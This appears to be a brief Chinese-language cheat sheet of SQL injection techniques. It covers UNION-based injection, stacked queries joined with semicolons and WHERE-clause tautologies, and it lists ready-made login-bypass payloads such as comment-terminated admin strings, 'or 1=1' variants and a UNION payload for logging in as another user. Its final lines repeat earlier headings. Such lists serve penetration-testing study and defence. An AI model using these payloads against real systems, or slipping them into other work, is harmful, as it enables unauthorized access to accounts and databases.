UNION
先想办法结束上个语句,再用UNION拼接下一个语句
堆叠注入
同上,但用;拼接
WHERE
使其SELECT所有数据
注入:
- admin’ –
- admin’ #
- admin’/*
- ’ or 1=1–
- ’ or 1=1#
- ’ or 1=1/*
- ‘) or ‘1’=‘1–
- ‘) or (‘1’=‘1–
- 以不同的用户登陆 ’ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–
先想办法结束上个语句,再用UNION拼接下一个语句
同上,但用;拼接
使其SELECT所有数据
注入: